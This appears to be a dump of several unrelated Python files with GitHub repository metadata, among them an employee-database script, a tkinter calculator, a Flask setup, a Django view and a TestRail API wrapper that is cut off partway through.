('Admin supervisor', '2012-10-01', '2014-11-10', 45900, 'Peter', 'AD01'),
('Admin manager', '2014-11-14', '2018-01-05', 45900, 'Peter', 'MG01')
]
try:
database.connect()
database.execute_sql('PRAGMA foreign_keys = ON;')
for job in jobs:
with database.transaction():
new_job = Job.create(
job_name=job[JOB_NAME],
start_date=job[START_DATE],
end_date=job[END_DATE],
salary=job[SALARY],
person_employed=job[PERSON_EMPLOYED],
departmnet=job[DPT_NUMBER])
new_job.save()
logger.info('Reading and printing all Job rows (note the value of person)...')
for job in Job:
logger.info(f'{job.job_name} : {job.start_date} ' +
f'to {job.end_date} for {job.person_employed} ' +
f'dept_id: {job.departmnet}')
except Exception as e:
logger.info(f'Error creating = {job[JOB_NAME]}')
logger.info(e)
finally:
logger.info('database closes')
database.close()
def select_dpt_history():
"""
Produces a list using pretty print that shows all of
the departments a person worked in for every job they ever had.
"""
database = SqliteDatabase('personjob.db')
database.connect()
database.execute_sql('PRAGMA foreign_keys = ON;')
names = Job.select(Job.person_employed).distinct()
for name in names:
print("\nEmployee name: {}".format(str(name.person_employed)))
query = (Job
.select(Person.person_name, Department.dpt_name, Department.dpt_number,
Job.start_date, Job.end_date)
.join(Person, on=(Person.person_name == Job.person_employed))
.join(Department, on=(Department.dpt_number == Job.departmnet))
.where(Person.person_name == name.person_employed)
.namedtuples())
for row in query:
days_worked = day_diff(row.end_date, row.start_date)
out = ("Department number: " + row.dpt_number,
"Department name: " + row.dpt_name,
"Start Date: " + row.start_date,
"End Date: " + row.end_date,
"Days Worked: " + str(days_worked))
pprint.pprint(out)
def day_diff(d1, d2):
date1 = datetime.strptime(d1, '%Y-%m-%d')
date2 = datetime.strptime(d2, '%Y-%m-%d')
return abs((date2 - date1).days)
if __name__ == '__main__':
populate_person_data()
populate_department_data()
populate_job_data()
select_dpt_history()
|
[
"39395936+Parzival-X@users.noreply.github.com"
] |
39395936+Parzival-X@users.noreply.github.com
|
a2f4e07c274825a0184b7b09375b857d0da36811
|
85a809b3afb3bb5a2189670b1a557d1edcbed4f1
|
/Calci.py
|
438cf68c2b76cde9e4c86b99a1268e01d733ab46
|
[] |
no_license
|
sonunikam/calci
|
9b69abaf71713f4871941d708950fa194088a2aa
|
82b0a3aff3ecc3464507de28e5038a9580066cb5
|
refs/heads/main
| 2023-01-08T09:31:21.729649
| 2020-11-14T06:19:41
| 2020-11-14T06:19:41
| 311,559,097
| 2
| 1
| null | 2020-11-11T08:47:08
| 2020-11-10T05:49:54
|
Python
|
UTF-8
|
Python
| false
| false
| 3,000
|
py
|
# calci
from tkinter import *
def click(event):
global scvalue
text=event.widget.cget("text")
if (text=='='):
if scvalue.get().isdigit():
value=int(scvalue.get())
else:
try:
value=eval(screen.get())
except Exception as e:
value="ERROR"
scvalue.set(value)
screen.update()
elif(text=='<-'):
value=scvalue.get()
scvalue.set(value[:-1])
elif(text=='C'):
scvalue.set("")
screen.update()
else:
scvalue.set(scvalue.get() + text)
screen.update()
root=Tk()
scvalue=StringVar()
scvalue.set("")
screen=Entry(root,text=scvalue,font="lucida 18 bold")
screen.pack(pady=8)
f1=Frame(root,bg="grey")
b1=Button(f1,text="9",font="lucida 20 bold")
b1.bind("<Button-1>",click)
b1.pack(padx=30,pady=20,side="left")
b2=Button(f1,text="8",font="lucida 20 bold")
b2.bind("<Button-1>",click)
b2.pack(padx=30,pady=20,side="left")
b3=Button(f1,text="7",font="lucida 20 bold")
b3.bind("<Button-1>",click)
b3.pack(padx=30,pady=20,side="left")
b4=Button(f1,text="/",font="lucida 20 bold")
b4.bind("<Button-1>",click)
b4.pack(padx=30,pady=20,side="left")
f1.pack()
f2=Frame(root,bg="grey")
b1=Button(f2,text="6",font="lucida 20 bold")
b1.bind("<Button-1>",click)
b1.pack(padx=30,pady=20,side="left")
b2=Button(f2,text="5",font="lucida 20 bold")
b2.bind("<Button-1>",click)
b2.pack(padx=30,pady=20,side="left")
b3=Button(f2,text="4",font="lucida 20 bold")
b3.bind("<Button-1>",click)
b3.pack(padx=30,pady=20,side="left")
b4=Button(f2,text="*",font="lucida 20 bold")
b4.bind("<Button-1>",click)
b4.pack(padx=30,pady=20,side="left")
f2.pack()
f3=Frame(root,bg="grey")
b1=Button(f3,text="3",font="lucida 20 bold")
b1.bind("<Button-1>",click)
b1.pack(padx=30,pady=20,side="left")
b2=Button(f3,text="2",font="lucida 20 bold")
b2.bind("<Button-1>",click)
b2.pack(padx=30,pady=20,side="left")
b3=Button(f3,text="1",font="lucida 20 bold")
b3.bind("<Button-1>",click)
b3.pack(padx=30,pady=20,side="left")
b4=Button(f3,text="-",font="lucida 20 bold")
b4.bind("<Button-1>",click)
b4.pack(padx=30,pady=20,side="left")
f3.pack()
f4=Frame(root,bg="grey")
b1=Button(f4,text="C",font="lucida 20 bold")
b1.bind("<Button-1>",click)
b1.pack(padx=30,pady=20,side="left")
b2=Button(f4,text="0",font="lucida 20 bold")
b2.bind("<Button-1>",click)
b2.pack(padx=30,pady=20,side="left")
b3=Button(f4,text="=",font="lucida 20 bold")
b3.bind("<Button-1>",click)
b3.pack(padx=30,pady=20,side="left")
b4=Button(f4,text="+",font="lucida 20 bold")
b4.bind("<Button-1>",click)
b4.pack(padx=30,pady=20,side="right")
f4.pack()
f5=Frame(root,bg='grey')
b1=Button(f5,text="<-",font="lucida 20 bold")
b1.bind("<Button-1>",click)
b1.pack(padx=30,pady=20,side="left")
b2=Button(f5,text="%",font="lucida 20 bold")
b2.bind("<Button-1>",click)
b2.pack(padx=30,pady=20,side="left")
b3=Button(f5,text="(",font="lucida 20 bold")
b3.bind("<Button-1>",click)
b3.pack(padx=30,pady=20,side="left")
b4=Button(f5,text=")",font="lucida 20 bold")
b4.bind("<Button-1>",click)
b4.pack(padx=30,pady=20,side="left")
f5.pack()
root.mainloop()
|
[
"noreply@github.com"
] |
noreply@github.com
|
dfd8d0e996b2f8152eddcccd4b7cd502b51f7d2e
|
8defe82f4195901bc72b88acd544bebdce5ab3ba
|
/Documents/Baby-Sitter/app/__init__.py
|
97c725c82c3a0f9bfa6af6a409bab42e784c0333
|
[
"MIT"
] |
permissive
|
amtesire/Baby-Sitter-App
|
c40e140d0880c5fdfbc57040be22ba0de069cb18
|
be8f16fa0e4d5ece615a5c05ba90149ee8dd437d
|
refs/heads/master
| 2023-01-27T15:53:42.273662
| 2020-12-11T11:12:00
| 2020-12-11T11:12:00
| 319,697,783
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,196
|
py
|
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask_login import LoginManager
from flask_uploads import UploadSet, configure_uploads, IMAGES
from flask_mail import Mail
from flask_bootstrap import Bootstrap
from flask_admin import Admin
from config import config_options
db = SQLAlchemy()
login_manager = LoginManager()
login_manager.session_protection = "strong"
login_manager.login_view = "auth.login"
photos = UploadSet("photos", IMAGES)
mail = Mail()
bootstrap = Bootstrap()
admin = Admin()
def create_app(config_name):
app = Flask(__name__)
# Creating the app configurations
app.config.from_object(config_options[config_name])
# Initializing flask extensions
db.init_app(app)
login_manager.init_app(app)
mail.init_app(app)
bootstrap.init_app(app)
admin.init_app(app)
# Registering the main app Blueprint
from .main import main as main_blueprint
app.register_blueprint(main_blueprint)
# Registering auth blueprint
from .auth import auth as auth_blueprint
app.register_blueprint(auth_blueprint, url_prefix = "/authenticate")
# Configure UploadSet
configure_uploads(app, photos)
return app
|
[
"tesiregisele@gmail.com"
] |
tesiregisele@gmail.com
|
e03a1a11ec0a72b1f933899c0e29c373b5024e0b
|
2efed10762498111ff9605bbb616aeb3855c1ed7
|
/airflow-section-7/venv3/bin/jsonschema
|
599d5d59b97ea285b084d7b9c7c429edc14e8748
|
[] |
no_license
|
IndrajeetTech2020/airflow-material
|
e05b4f02464150a20277086c6d6b0b203b741a94
|
4c6ce47eeebadb746e867ce2b1605af79f6bd858
|
refs/heads/master
| 2023-05-11T16:01:48.017050
| 2021-05-22T02:02:42
| 2021-05-22T02:02:42
| 369,693,170
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 293
|
#!/home/indrajeet/Downloads/airflow-materials/airflow-materials/airflow-section-7/venv3/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from jsonschema.cli import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"indrajeetpradhan1998@gmail.com"
] |
indrajeetpradhan1998@gmail.com
|
|
f35fa005b2b679e759f83c8c1abaa1ee213bf401
|
5d025bc7c59b0f9f5d8b6c1577beab0375644e5f
|
/excepciones/Exception1.py
|
fd69384e9ad2d28ce30a3b5152074ffe8140cee8
|
[] |
no_license
|
miguelLopezUlloa/Python-course
|
1724dea70e9e278d114b3586bf0ae4bb5133f29f
|
de20577640b7e89418cdedaa8ce9f61a2a106783
|
refs/heads/master
| 2022-11-24T06:34:47.607845
| 2020-07-29T18:09:09
| 2020-07-29T18:09:09
| 270,719,675
| 0
| 0
| null | 2020-07-29T18:09:10
| 2020-06-08T15:26:42
|
Python
|
UTF-8
|
Python
| false
| false
| 2,548
|
py
|
from excepciones.NumberEqualsException import NumberEqualsException
class Exception1:
def __init__(self):
print("Manage exception are ready")
def mngExceptionCase1(self):
resultado = None
a = "10"
b = 0
try:
resultado = a/b
# except ZeroDivisionError as e --> Esta manera solo atrapara Division / 0 y la de Typo NO
except Exception as e:
print("Ocurrio un error", e)
print(type(e))
print("Continua el procesamiento....")
print("El resultado de la operacion es:",resultado)
def mngExceptionCase2(self):
resultado = None
a = int(input("Introduce un número:"))
b = int(input("Introduce otro número:"))
try:
resultado = a / b
# except ZeroDivisionError as e --> Esta manera solo atrapara Division / 0 y la de Typo NO
except ZeroDivisionError as e:
print("Ocurrio un error atrapado por ZeroDivisionError", e)
print(type(e))
except TypeError as e:
print("Ocurrio un error atrapado por Type Error", e)
print(type(e))
except ValueError as e:
print("Ocurrio un error atrapado por Value Error", e)
print(type(e))
except Exception as e:
print("Ocurrio un error atrapado por Exception Gral", e)
print(type(e))
else:
print("No se presento ninguna exception")
finally:
print("Fin del manejo de Exceptions")
print("Continua el procesamiento....")
print("El resultado de la operacion es:", resultado)
def mngExceptionCase3(self):
resultado = None
try:
a = int(input("Introduce un número:"))
b = int(input("Introduce otro número:"))
if a == b:
raise NumberEqualsException("Detectados Números Identicos en los valores introducidos..")
resultado = a/b
# except ZeroDivisionError as e --> Esta manera solo atrapara Division / 0 y la de Typo NO
except Exception as e:
print("Ocurrio un error.. +:", e)
print(type(e))
print("Continua el procesamiento....")
print("El resultado de la operacion es:",resultado)
def listAllExceptions(self):
print(dir(locals()['__builtins__']))
#print("Hola")
excpt = Exception1()
#excpt.mngExceptionCase1()
#excpt.mngExceptionCase2()
excpt.mngExceptionCase3()
print("*" *60)
#excpt.listAllExceptions()
|
[
"miguel.lopez@dowjones.com"
] |
miguel.lopez@dowjones.com
|
824947c3b5c7b495bbbdf88e62494e33eff4afdf
|
06f3841613e1d5ff907237975809bad70ba78c2b
|
/replayMemory.py
|
7e7258c05206bdc8186d4f3d0d1f3469bad65b85
|
[
"MIT"
] |
permissive
|
hagianga21/MaxCon_RL
|
ededf7fe9cc391ae7ae6cefed7e1af4692e4bdf4
|
60f24eb74673998de3a37db251f4222ee33ba1c4
|
refs/heads/main
| 2023-03-21T21:51:18.150915
| 2021-03-21T07:00:59
| 2021-03-21T07:00:59
| 349,752,023
| 9
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 682
|
py
|
from collections import namedtuple
import random
Transition = namedtuple('Transition', ('state', 'action', 'next_state', 'reward'))
class ReplayMemory(object):
def __init__(self, capacity):
self.capacity = capacity
self.memory = []
self.position = 0
def push(self, *args):
"""Saves a transition."""
if len(self.memory) < self.capacity:
self.memory.append(None)
self.memory[self.position] = Transition(*args)
self.position = (self.position + 1) % self.capacity
def sample(self, batch_size):
return random.sample(self.memory, batch_size)
def __len__(self):
return len(self.memory)
|
[
"hagianga21@gmail.com"
] |
hagianga21@gmail.com
|
e68c7430674468cf9214f7d81eba5c79ff1247f5
|
2b89acad6d77f9f6c7dcd7f77c3a5b17e503441a
|
/Server/app/conf/__init__.py
|
6eedbbab73b0c5531f79d47d92acbf2b96e9b2d1
|
[] |
no_license
|
Harriet92/2ndHandBookshop
|
665aa874024f30e1e8775dc0a5c8ca525eae4c6f
|
e591e4cc41afd6e18e6f98544ac83af7e887b6d7
|
refs/heads/master
| 2020-04-10T15:56:02.433447
| 2015-05-28T04:09:09
| 2015-05-28T04:09:09
| 32,283,339
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 191
|
py
|
import os
config = None
if 'DYNO' in os.environ:
from .production import ProductionConfig
config = ProductionConfig
else:
from.local import LocalConfig
config = LocalConfig
|
[
"jakub.skalecki@gmail.com"
] |
jakub.skalecki@gmail.com
|
fa9595421ba7e822be4602f3069f21c36cc63d8c
|
5192d92243ef24033c0a168e3856576aff33a41a
|
/CTRL/views.py
|
86967a79752cc5f3041fb291615f9191d8ffe4b7
|
[] |
no_license
|
drkessler91/CTRL_SHIFT
|
2649aea92ce54bbe8ab6915325d57c089e7a4910
|
72f828d7f3d0276006fbb4f8f13adc94a7dcb195
|
refs/heads/main
| 2023-06-22T02:33:31.934691
| 2023-06-14T11:53:01
| 2023-06-14T11:53:01
| 320,360,412
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,380
|
py
|
from django.shortcuts import render, HttpResponse, redirect
from CTRL_SHIFT import CtrlShift
from CTRL.InputForm import InputForm
# Create your views here.
def login(request):
context = {}
context['form'] = InputForm()
return render(request, 'login_page.html', context)
employees_name = CtrlShift.name_for_employee_in_shift
employees_shifts = CtrlShift.fillEmp()
print(employees_shifts)
def shift(request):
print('Worker Number')
if request.method == 'POST':
emp_id = request.POST.get('uname')
print(emp_id)
for i in range(employees_shifts.__len__()):
key = employees_shifts.__getitem__(i)
if key.get(int(emp_id)):
print(key)
for employee_name in range(employees_name.__len__()):
key_name = employees_name.__getitem__(employee_name)
if key_name[2] == (int(emp_id)):
for j in range(key.__len__()):
emp = key[int(emp_id)]
emp.__setitem__('first_name', key_name[0])
emp.__setitem__('last_name', key_name[1])
print('emp')
print(emp)
return render(request, 'shift_page.html', {'emp':emp})
"""
class CtrlConfig(AppConfig):
name = "CTRL"
"""
|
[
"50701121+drkessler91@users.noreply.github.com"
] |
50701121+drkessler91@users.noreply.github.com
|
ef3e92d292f57491fdb6d13b199c0e64f878aebd
|
c4d660850a0043dacaa3b19f5619bd21f9c78018
|
/CSVReader.py
|
ce788dbfd994f25436623386be410b122840cb9a
|
[] |
no_license
|
tungminh111/speech_processing
|
d6ebb154e251085afce8a8d1d69b9b197f2388b4
|
c5d7ab95d4bc78dcd309f6ef4f72c9a726e457d7
|
refs/heads/master
| 2021-04-23T02:24:06.510294
| 2020-05-10T09:02:47
| 2020-05-10T09:02:47
| 249,889,894
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,623
|
py
|
import csv
import os
import re
class CSVReader:
def __init__(self):
self.reader = None
self.dir_path = os.path.dirname(os.path.realpath(__file__))
self.mssv = []
dirname = os.path.join(self.dir_path, 'assignment1')
for subdirname in os.listdir(dirname):
if subdirname[:8] not in self.mssv:
self.mssv.append(subdirname[:8])
self.ouput_path = os.path.join(self.dir_path, "output_data")
def recordWord(self, s):
output_path = os.path.join(self.ouput_path, s)
output_path = os.path.join(output_path, s + ".txt")
wf = open(output_path, 'w', encoding='utf-8')
orgS = s
s = s.lower()
s = re.split(' *', s)
c = 0
with open('text-data.csv', mode='r', encoding='utf-8') as csv_file:
csv_reader = csv.DictReader(csv_file)
for row in csv_reader:
if row['Mã SV'] not in self.mssv:
continue
dirname = os.path.join(self.dir_path, 'assignment1')
for subdirname in os.listdir(dirname):
if not os.path.isdir(os.path.join(dirname, subdirname)):
continue
if subdirname[:8] == row['Mã SV']:
dirname = os.path.join(dirname, subdirname)
break
for key, value in row.items():
if key != 'STT' and key != 'Mã SV' and key != 'Họ và tên':
lineList = value.split('\n')
for id in range((len(lineList) - 1) // 2):
filename = lineList[1 + id * 2]
sentence = lineList[2 + id * 2]
sentence = str(sentence).lower()
wordList = re.split('\.|,| * ',sentence)
if self.match(s, wordList):
filename = self.findFile(dirname, key, filename)
if filename == 'not found':
continue
c += 1
self.writeFile(wf, filename)
wf.close()
print(c)
def match(self, s, t):
for i in range(len(t) - len(s) + 1):
cur = True
for j in range(len(s)):
if s[j] != t[i + j]:
cur = False
break
if cur:
return True
return False
def writeFile(self, wf, filename):
wf.write(os.fsdecode(filename) + "\n")
def no_accent_vietnamese(self, s):
s = re.sub(u'[àáạảãâầấậẩẫăằắặẳẵ]', 'a', s)
s = re.sub(u'[ÀÁẠẢÃĂẰẮẶẲẴÂẦẤẬẨẪ]', 'A', s)
s = re.sub(u'èéẹẻẽêềếệểễ', 'e', s)
s = re.sub(u'ÈÉẸẺẼÊỀẾỆỂỄ', 'E', s)
s = re.sub(u'òóọỏõôồốộổỗơờớợởỡ', 'o', s)
s = re.sub(u'ÒÓỌỎÕÔỒỐỘỔỖƠỜỚỢỞỠ', 'O', s)
s = re.sub(u'ìíịỉĩ', 'i', s)
s = re.sub(u'ÌÍỊỈĨ', 'I', s)
s = re.sub(u'ùúụủũưừứựửữ', 'u', s)
s = re.sub(u'ƯỪỨỰỬỮÙÚỤỦŨ', 'U', s)
s = re.sub(u'ỳýỵỷỹ', 'y', s)
s = re.sub(u'ỲÝỴỶỸ', 'Y', s)
s = re.sub(u'Đ', 'D', s)
s = re.sub(u'đ', 'd', s)
return s.encode('utf-8')
def findFile(self, dirpath, dirname, filename):
dirname = re.split('-| *|_', dirname)
for i in range(len(dirname)):
dirname[i] = dirname[i].lower()
dirname[i] = self.no_accent_vietnamese(dirname[i])
for subdir, dirs, files in os.walk(dirpath):
basename = os.path.basename(subdir)
basename = re.split('-| *|_', basename)
same = True
for i in range(len(basename)):
basename[i] = basename[i].lower()
basename[i] = self.no_accent_vietnamese(basename[i])
if len(basename) != len(dirname):
same = False
else:
for i in range(len(basename)):
if basename[i] != dirname[i]:
same = False
if not same:
continue
for file in files:
if file == filename:
return os.path.join(subdir, filename)
return 'not found'
if __name__ == '__main__':
reader = CSVReader()
reader.recordWord('')
|
[
"noreply@github.com"
] |
noreply@github.com
|
8d7fa55e0388af171f10bc6a0f4656f87b9dc16d
|
702be375c7cbfdd2f2d3ea23df7efddafcf74158
|
/novel_xbiquge/novel_xbiquge/items.py
|
a741402a93b0d8e287e54d064c2fbdc66f340020
|
[] |
no_license
|
Jason-wjq/novel
|
1b5b6e2e4367e8326895aed0ecd938510c95614e
|
9a1b68ce83eaa48fd61b71d95edd45832aafb97e
|
refs/heads/master
| 2020-09-15T08:36:48.128932
| 2019-11-22T13:02:33
| 2019-11-22T13:02:33
| 223,396,829
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 426
|
py
|
# -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# https://docs.scrapy.org/en/latest/topics/items.html
import scrapy
class NovelXbiqugeItem(scrapy.Item):
# define the fields for your item here like:
# name = scrapy.Field()
title = scrapy.Field()
author = scrapy.Field()
chapter = scrapy.Field()
content = scrapy.Field()
ordinal = scrapy.Field()
|
[
"1391054830@qq.com"
] |
1391054830@qq.com
|
f267772e5599c4c70cc4a2c5087d55617d7fc582
|
0627fe073de8af9a63d48a15ee0b1077fd8ffd98
|
/py3/TestRailLib.py
|
1bb5041357e7936e1eca4eea520144914b157701
|
[] |
no_license
|
prabhukalaimani/Python-and-TestRail
|
d312158a59a35d0431d3180f4049f7fefbbb00b4
|
cae168eafbdcabb6af70e7c4a8c4be022309b36f
|
refs/heads/master
| 2021-10-01T14:59:08.426139
| 2018-11-27T04:21:18
| 2018-11-27T04:21:18
| 114,306,354
| 4
| 0
| null | 2018-11-27T04:21:19
| 2017-12-14T23:34:43
|
Python
|
UTF-8
|
Python
| false
| false
| 23,132
|
py
|
#!/usr/bin/python
"""
Author: Prabhu Kalaimani
Purpose:
The purpose of the library is to use the api's provided by TestRail.
This utility is developed using python 3 environment.
Note: We need the Testrail binding methods which can be downloaded from
from https://github.com/gurock/testrail-api
"""
from testrail import APIClient, APIError
import urllib.error as err
import trDefines as Defines
import logging
import logging.config
import os
class TestRailLib:
"""
This class contains methods for accessing TestRail API's.
For more information : https://www.gurock.com/testrail
"""
def __init__(self, tr_server, user_name, password):
"""
This method will initialize the TestRail server using the user name and password provided
:param tr_server: Name of the Test Rail server
:param user_name: TestRail user id
:param password: TestRail password
"""
file_dir = os.path.split(os.path.realpath(__file__))[0]
logging.config.fileConfig(os.path.join(file_dir, "trlogger.ini"))
# Configure the logger
self._log = logging.getLogger('testrail')
self._log.info("Starting TestRail application ")
# TestRail Connection status
# Note: This variable is used to ensure we have a valid TestRail Instance
self._connection_status = False
try:
# Check if the URL is valid
self._client = APIClient(tr_server)
self._client.password = password
self._client.user = user_name
self._connection_status = True
# Check if the url, user name and password is set correctly by accessing an API
self._client.send_get(Defines.TR_API_GET_PROJ + "/" + str(Defines.TR_PROJ_ID_OTG))
self._log.info("Connected to TestRail server {} with user-id {}".format(tr_server, user_name))
except err.URLError:
self._log.exception("Url: {} is not valid".format(tr_server))
raise err.URLError("Error: Please check the URL")
except APIError:
self._log.critical(
"User-id or Password is not correct. Failed to connect with TestRail url: {}".format(tr_server))
raise APIError("Error: Please check user id and password")
def __extract_dictionary(self, src_dict, extract_list, dict_type=Defines.DICT_SUB, ret_dict_key=Defines.TR_TP_ID):
"""
This method will extract and create a new dictionary based on the attributes passed.
The extraction can be done on a single plain dictionary or dictionary within a dictionary.
Note: The ret_dict_key must be an unique identifier as its the ret_dict key.
:param src_dict: Source dictionary
:param extract_list: List of keys to be extracted
:param dict_type: This parameter determines if we need to extract values from simple dictionary
or sub dictionaries
:param ret_dict_key: Key that must be used for return dictionary
:return: List of dictionary with ret_dict_key as key.
Example output ret_dict = { 1:{'description':'Example 1'} , 2: {'description': 'Example 2} }
"""
if extract_list:
# Extracting list containing dictionary of dictionary ( sub dictionary)
# Example [ 1:{'description':'Example 1'} , 2: {'description': 'Example 2} ]
if dict_type in Defines.DICT_SUB:
ret_dict = []
# This code applies on sub dictionary
for src_key in src_dict:
tmp_list = {}
for extract_key in extract_list:
# Check if the key is present in source dictionary ( dictionary of dictionary)
if extract_key in src_key:
tmp_list[extract_key] = src_key[extract_key]
else:
self._log.info(
"{} is invalid key or not present in the source dictionary".format(extract_key))
# update the return dictionary with key as the plan id
if dict_type in Defines.DICT_SUB:
ret_dict.append({src_key[ret_dict_key]: tmp_list})
else:
ret_dict.append(tmp_list)
else:
# Extracting items from Plain dictionary
# In simple scenario it will return a dictionary not a list
ret_dict = {}
for extract_key in extract_list:
if extract_key in src_dict:
ret_dict[extract_key] = src_dict[extract_key]
else:
self._log.debug("Nothing to extract. All items will be returned")
ret_dict = src_dict
return ret_dict
def count_values_in_sub_dict(self, dict_list, grp_item_key):
"""
This method will group and count the keys of a sub dictionary
See the example in the doc string for output
:param dict_list: Input dictionary
:param grp_item_key: key which needs to be grouped
:return: count of the values in the sub dictionary
Example : [ A:{color:'a'}, B:{color:'b'}, C:{color:'a'}, D:{color:'a'}]
output: {a:3, b1}
"""
ret_dict = {}
cnt = 1
try:
for list_items in dict_list:
for key, value in list_items.items():
if value[grp_item_key] in ret_dict:
ret_dict[value[grp_item_key]] = ret_dict[value[grp_item_key]] + 1
else:
ret_dict[value[grp_item_key]] = cnt
except KeyError:
self._log.exception("KeyError Exception for key ")
return ret_dict
def tr_api_post(self, api, params):
"""
This method is a wrapper method to call the POST methods of TestRail
:param api: Test Rail API
:param params: Post parameters for the Test Rail API.
:return: True, message or False, Message
True with and the return message will vary depending on
the api requested
False with and the return message will be the exception caught
"""
status = False
try:
return_msg = self._client.send_post(api, params)
status = True
self._log.info("Successfully sent data using POST method. API = {} Data = {}".format(api, params))
except APIError as e:
self._log.exception("API Exception for api POST {} - Exception: {}".format(api, e))
return_msg = e
return status, return_msg
def tr_api_get(self, api, params):
"""
This method is a wrapper method to call the GET methods of TestRail
apends the TestRail API and the parameters.
:param api: TestRail api to be called ( Example: get_case)
:param params: The GET parameters for API Methods
:return: True, message or False, Message
True with and the return message will vary depending on
the api requested
False with and the return message will be the exception caught
"""
status = False
try:
return_msg = self._client.send_get(api+"/"+str(params))
status = True
self._log.info("Successfully sent data using GET method. API = {} Data = {}".format(api, params))
except APIError as e:
self._log.exception("API Exception for api GET {} - Exception: {}".format(api, e))
return_msg = e
return status, return_msg
# Methods for TestRail Test Plans
def tr_get_all_plans(self, project_id, project_fields):
"""
This method will extract all the plans for a project. We can specify what attribute of TestRail project
We want to extract using project_fields.
:param project_id: Project id ( Example 1)
:param project_fields: This is a list of fields needed for project
Example: project passed count, failed count etc
:return: status( Boolean) and ret_list : list of Plans with attributes from project_fields
"""
ret_dict = None
status, ret_list = self.tr_api_get(Defines.TR_API_GET_PLANS, project_id)
if status:
ret_dict = self.__extract_dictionary(ret_list, project_fields)
return status, ret_dict
def tr_get_tc_suites_in_project(self, project_id=Defines.TR_CURRENT_PROJECT, extract_list=None):
"""
This method will get the suites available in the TestRail project
:param project_id: Project id
:param extract_list: The attribute required to be extracted from test suites
:return: Dictionary of project test suites with the attributes mentioned in extract_list
"""
# If the extract list is none at least extract the description
if extract_list is None:
extract_list = [Defines.TR_TS_DESCRIPTION]
ret_dict = {}
ret_status, suite_list = self.tr_api_get(Defines.TR_API_GET_SUITES, project_id)
if ret_status:
ret_dict = self.__extract_dictionary(suite_list, extract_list, ret_dict_key=Defines.TR_TS_ID)
else:
self._log.error("Error in getting test suites")
return ret_status, ret_dict
def tr_get_tescase_in_run(self, run_id, extract_list=None):
"""
This method will extract all the test for a run. You can pass what you want to extract using extract_list.
:param run_id: Test run id
:param extract_list: attributes that needs to be extracted
:return: list of dictionaries containing the test case information
"""
ret_list = []
# if the extract list is None. Extract the Description and automated fields
if extract_list is None:
extract_list = [Defines.TR_TC_CUSTOM_TEST_DESCRIPTION, Defines.TR_TC_CUSTOM_AUTOMATED]
status, tc_list = self.tr_api_get(Defines.TR_TESTS_GET_TESTS, run_id)
if status:
# For each test extract the required elements
for tst in tc_list:
ret_list.append(self.__extract_dictionary(tst, extract_list, dict_type=Defines.DICT_SIMPLE))
self._log.info("Extracted test cases successfully from run {}".format(run_id))
else:
self._log.error("Error in extracting the test cases for run {}".format(run_id))
return status, ret_list
def tr_get_test_cases(self, suite_id, extract_list=None):
"""
This method will get all the test cases of a suite. A suite in TestRail contains collection of
test cases
:param suite_id: suite id from TestRail
:param extract_list: attribuites needed to extract for each test case. Use the TR_TC_XXXX attributes
:return: Status , dictionary of test cases available for the suite
"""
ret_dict = {}
# if the extract list is none extract the description and created by fields
if extract_list is None:
extract_list = [Defines.TR_TC_CUSTOM_TEST_DESCRIPTION, Defines.TR_TC_CREATED_BY]
qry_str = str(Defines.TR_CURRENT_PROJECT) + "&" + Defines.TR_TS_SUITE_ID + "=" + str(suite_id)
status, ret_list = self.tr_api_get(Defines.TR_API_GET_CASES, qry_str)
if status:
ret_dict = self.__extract_dictionary(ret_list, extract_list, ret_dict_key=Defines.TR_TC_ID)
else:
self._log.error("Error in getting the test case")
return status, ret_dict
def tr_get_test_case_info(self, tc_id, extract_list=None):
ret_dict_list = None
# Extract title as default value
if extract_list is None:
extract_list = [Defines.TR_TC_TITLE]
status, ret_list = self.tr_api_get(Defines.TR_API_GET_CASE, tc_id)
if status:
ret_dict_list = self.__extract_dictionary(ret_list, extract_list, dict_type=Defines.DICT_SIMPLE,
ret_dict_key=Defines.TR_TC_ID)
else:
self._log.error("Error in executing API {}".format(Defines.TR_API_GET_CASE))
return status, ret_dict_list
def tr_get_test_plan(self, plan_id, ):
"""
This method will get the plan in a test run.
A run id start with RXXXX format in TestRail
:param plan_id:
:return:
"""
status, ret_msg = self.tr_api_get(Defines.TR_API_GET_PLAN, plan_id)
if not status:
self._log.error("Error while getting the plan details for plan {}".format(plan_id))
return status, ret_msg
def tr_get_testsuite_info_in_test_plan(self, plan_id):
"""
This method will get the list of test suites in a test plan. The return dictionary
will also contain the config information of a test suite.
:param plan_id:
:return:
"""
# Testplan - > Test runs -> config
ret_dict_list = []
# First get the test plan details. Test plan will contain test suites.
# Test suites can have multiple Configurations
status, ret_msg = self.tr_get_test_plan(plan_id)
if status:
# Get the runs of the test plan. This can be extracted using the entries field in the test plan
tp_entries = ret_msg[Defines.TR_TP_ENTRIES]
if tp_entries:
# For each entries ( Test suites) get the suite information and the config information.
# Ex: a test suite A can be tested on different configs like iOS or Android
for entries_item in tp_entries:
runs = entries_item[Defines.TR_TP_RUNS]
for run in runs:
tmp = {run[Defines.TR_TS_ID]: {Defines.TR_TP_SUITE_ID: run[Defines.TR_TP_SUITE_ID],
Defines.TR_TP_TR_CONFIG: run[Defines.TR_TP_TR_CONFIG],
Defines.TR_TP_TR_CONFIG_IDS: run[Defines.TR_TP_TR_CONFIG_IDS]}}
ret_dict_list.append(tmp)
else:
# The plan has no suites. Make an entry in the logger
self._log.error(
"Test plan has no test suites selected. Check and add test suites to the test plan {}".format(
plan_id))
else:
self._log.error("Error in calling tr_get_test_plan for the run_id-{}".format(plan_id))
return status, ret_dict_list
def tr_get_testcase_in_test_plan(self, plan_id, extract_list=None):
"""
This method will collect the test in a test plan using the test plan id and segregates into automated
and manual test cases.
:param plan_id: Test plan id
:param extract_list: Attribute which need to be extracted
:return: status (Boolean), automated test cases, manual test cases
"""
automated_test_case_list = []
manual_test_case_list = []
# default extract list to id
if extract_list is None:
